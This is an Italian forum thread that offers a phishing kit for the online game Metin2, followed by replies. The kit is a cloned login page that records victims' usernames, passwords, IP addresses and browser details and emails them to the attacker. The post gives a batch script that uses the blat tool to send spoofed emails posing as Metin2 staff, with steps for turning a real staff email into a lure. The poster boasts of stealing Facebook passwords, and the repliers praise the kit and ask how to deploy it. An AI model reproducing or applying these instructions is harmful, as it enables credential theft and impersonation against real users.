Thread obsoleto Metin2 Fake Login - Update 21/10/2010

stebe

Utente Medio
Autore del topic
26 Luglio 2009
103
0
Miglior risposta
0
PREMESSO : IO NON MI ASSUMO NESSUNA RESPONSABILITA' DELL'USO CHE FARETE DI QUESTO FAKE LOGIN, CREATO SOLO A SCOPO DIMOSTRATIVO/INFORMATIVO!
Ok detto questo incomcio a postarvi il link :
Perfavore, Entra oppure Registrati per vedere i Link!

scansione :

------------------------------------------------------------------------------------------------------------------------------------------------

- Assolutamente identico alla pagina originale.
- Salva username,password,ip,user agent (browser,sist.op. e altre info),data e ora in un file (password.html) nella stessa cartella dove è stato uppato il fake login. Le informazioni verranno salvate in questo file sotto forma di tabella...davvero molto bello.
- Invia username,password,ip,user agent,data e ora direttamente al tuo indirizzo email, i dati verranno organizzati sotto forma di tabella.
- Dopo che la vittima inserirà username e password verrà reindirizzata alla vera pagina di Metin 2, ovvero
.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

L'utilizzo è molto semplice, vi basterà estrarre i file dall'archivio che potete scaricare all'indirizzo che vi ho dato, modificare il file elaboro.php (sarà molto semplice e intuitivo, basta leggere i commenti vicino ai vari comandi[per aprire il file usate il blocco note])e uppare il tutto nel vostro sito,portare la vittima all'indirizzo del fake login, utilizzando un po di social engineer; io già sono riuscito a prendere molte password con il fake login di Facebook (che posterò sempre con l'update ! )

Screen(Cliccate 2 volte per vederlo meglio):
metin2fake.png

Aggiornamenti : Grotta Dell'esilio.
Nessun bug e/o problema nel login e nel navigare nel sito.
Email instantanee aggiuntive ( piu di una) appena i "nabboni " premono invio.

consiglio di usare blat ( scaricabile da qui ->
) per fakeloggare via mail

salvatelo come mail.bat
codice:

COPY blat.exe C:\WINDOWS\system32\blat.exe
COPY blat.dll C:\WINDOWS\system32\blat.dll
COPY blat.lib C:\WINDOWS\system32\blat.lib
blat -install out.alice.it metin@mail.com //sostituire a metin@mail.com l' indirizzo che appare quando metin vi manda una mail
cls
blat mail.htm -to vittima@mail.it -subject "quello che ti pare" // sostituire a "quello che ti pare" l' oggetto della mail e a "vittima@mail.com" l' indirizzo mail di a chi lo volete mandare
end

procedimento:
quando metin vi manda una mail salvate il codice htm della mail e modificatelo. Se l' e mail diceva, per esempio, di confermare l' indiizzo d' iscrizione, sostituite con "c' è un problema, devi verificare l' effettivo possesso dell' account loggando da qua" e poi ci piazzate il link del vostro fake login. Chiamiamola mail.htm

mettete blat.lib blat.dll blat.exe mail.bat e mail.htm nella stessa catella ed avviate mail.bat
a questo punto avete appena mandato, ad una persona a vostra scelta, una mail che:
1- ha la stessa grafica di una mail originale dello staff di metin
2- ha lo stesso mittente di una mail originale dello staff di metin
3- indirizza a loggare sul vostro fake login

Ok scusate...
Cmq chiedo ai Mod di spostarlo gentilmente nella sezione metin2 .... anche se penso stia meglio qua...

Ultima modifica:
sezione errata,va in metin2,segnalo
--------------- AGGIUNTA AL POST ---------------
comunque bel lavoro

Ultima modifica:
Faccio un altra segnalazione: non si chiede REP
--------------- AGGIUNTA AL POST ---------------
Cmq bello ;)

Ultima modifica:
Bel Lavoro Complimenti xo Sbajato sezione nn ti segnalo perchè già ti hanno segnalato :-)

Ragazzi scusate,ma io l'ho uppato su altervista e quando faccio visualizza sito mi dice stio in costruzione.Mi potresti dire il perchè?